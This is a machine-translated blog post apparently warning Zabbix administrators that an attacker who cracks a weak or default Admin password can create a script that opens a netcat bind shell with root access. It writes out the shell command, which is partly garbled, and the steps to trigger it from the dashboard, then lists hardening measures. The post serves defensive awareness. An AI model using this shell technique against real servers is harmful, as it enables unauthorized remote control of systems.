Zabbix security: Execute command after breaking weak password, get shell

If your Zabbix Admin password is too weak or use the default password (Admin/zabbix), and the hacker cracked the password, Zabbix server in front of the hacker has no resistance. Hackers can create "system.run[command,<mode>]" Monitoring items to execute commands, and even get the server shell to get root privileges.

First introduce "System.run[command,<mode>]", this monitoring item is the agent comes with, so that Zabbix server can remotely execute arbitrary commands on the agent's machine. There are two methods: one is to set up the monitoring item, and the other is to call directly by zabbix_get command. Command execution permissions are limited to the Zabbix agent's startup user, which is very dangerous if you set the agent's startup user to root (allowroot=1) for convenience.

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/5A/35/wKiom1T5aq-jkcptAAJ65jNc1XY524.jpg "title=" System.run.png "alt=" Wkiom1t5aq-jkcptaaj65jnc1xy524.jpg "/>

Here's a scenario that shows how a hacker can get the shell of a server, or even root privileges, in the case of a Zabbix admin password:

Here the shell is opened with the Netcat (NC) command, and if your system is the Redhat/centos series, the NC can be downloaded via yum.

Select "Administration", "Scripts", to create a script such as:

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5A/32/wKioL1T5cdrC573JAALmIjFxlAw432.jpg "title=" Shell.png "alt=" Wkiol1t5cdrc573jaalmijfxlaw432.jpg "/>

"Executeon" Select Zabbix Server, "Commands" in the input:

Mkfifo/tmp/tmp_fifocat/tmp/tmp_fifo | /bin/bash-i 2>&1 | Nc-l 2222 >/tmp/tmp_fifo

The above means to open a shell and listen on port 2222.

Enter the "Dashboard" interface, click on a host below, will pop up a "Scripts" tab, click on the "Create shell" created above, so the above command will be executed.

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M00/5A/36/wKiom1T5dADzBUAUAAKxQEV-E3M782.jpg "title=" Host.png "alt=" Wkiom1t5dadzbuauaakxqev-e3m782.jpg "/>

On the Zabbix server server, you can see that port No. 2222 is already listening.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/5A/36/wKiom1T5dmzRWShWAAF-AanTyDg021.jpg "title=" 2222. PNG "alt=" wkiom1t5dmzrwshwaaf-aantydg021.jpg "/>

Here we connect to the shell of the server using NC commands on our own machine:

650) this.width=650; "src=" Http://s3.51cto.com/wyfs02/M02/5A/36/wKiom1T5d_rwb1P9AAHHTfsOifc478.jpg "title=" Shell1.png "alt=" Wkiom1t5d_rwb1p9aahhtfsoifc478.jpg "/>

Shows that we have successfully obtained the shell of the Zabbix server, and it is root permission! This is because my Zabbix server is root-initiated.

here's how to secure the Zabbix to prevent this from happening:

1, very important point, Zabbix login password must be complex, do not use the default password or weak password.

2, Zabbix server and agent do not start with root, do not set allowroot=1.

3, prohibit agent execution System.run, do not set Enableremotecommands=1.

4, often hit security patches, if the system kernel version is too low to be vulnerable, even under the Zabbix user can still get root privileges.

Reference

Sohu Vulnerability Case:

http://www.wooyun.org/bugs/wooyun-2013-023089

Netcat command:

Http://www.oschina.net/translate/linux-netcat-command

This article is from the "Start Linux blog" blog, reproduced please contact the author!

Zabbix security: Execute command after breaking weak password, get shell